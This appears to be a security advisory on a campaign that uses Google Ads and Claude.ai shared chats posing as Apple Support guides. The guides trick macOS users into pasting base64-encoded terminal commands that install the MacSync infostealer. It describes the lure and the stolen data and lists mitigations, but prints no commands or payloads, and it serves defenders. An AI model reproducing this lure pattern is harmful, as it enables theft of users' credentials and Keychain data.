Technical description
Attackers are exploiting Anthropic's Claude.ai shared chat feature to host malicious 'Claude Code on Mac' installation guides that deliver the MacSync macOS infostealer. Two independent campaigns were identified, each using different domains and payloads but identical social engineering structure. Users clicking Google Ads for 'Claude mac download' are directed to real claude.ai URLs, but to attacker-controlled shared chats that instruct them to paste terminal commands that download and execute polymorphic malware.
Attack vector
Malvertising + social engineering. Attacker purchases Google Ads targeting 'Claude mac download,' directs users to legitimate claude.ai domain but to attacker-hosted shared chat. The chat impersonates official Apple Support documentation and instructs users to run base64-encoded commands in Terminal, which fetch polymorphic payload from attacker infrastructure.
Affected systems
macOS users searching for Claude Code CLI or Claude app downloads. Secondary victims: organizations with employees using Claude Code on macOS. The malware harvests browser credentials, cookies, and macOS Keychain contents.
Mitigation
Users: navigate directly to claude.ai and official Anthropic documentation; treat any terminal paste-command instructions with suspicion, regardless of source. Organizations: block unauthorized macOS Keychain access via MDM, monitor for suspicious osascript executions, advise users to never paste terminal commands from AI chat interfaces. Anthropic/Google: implement stronger controls on shared chat feature to prevent impersonation of support documentation.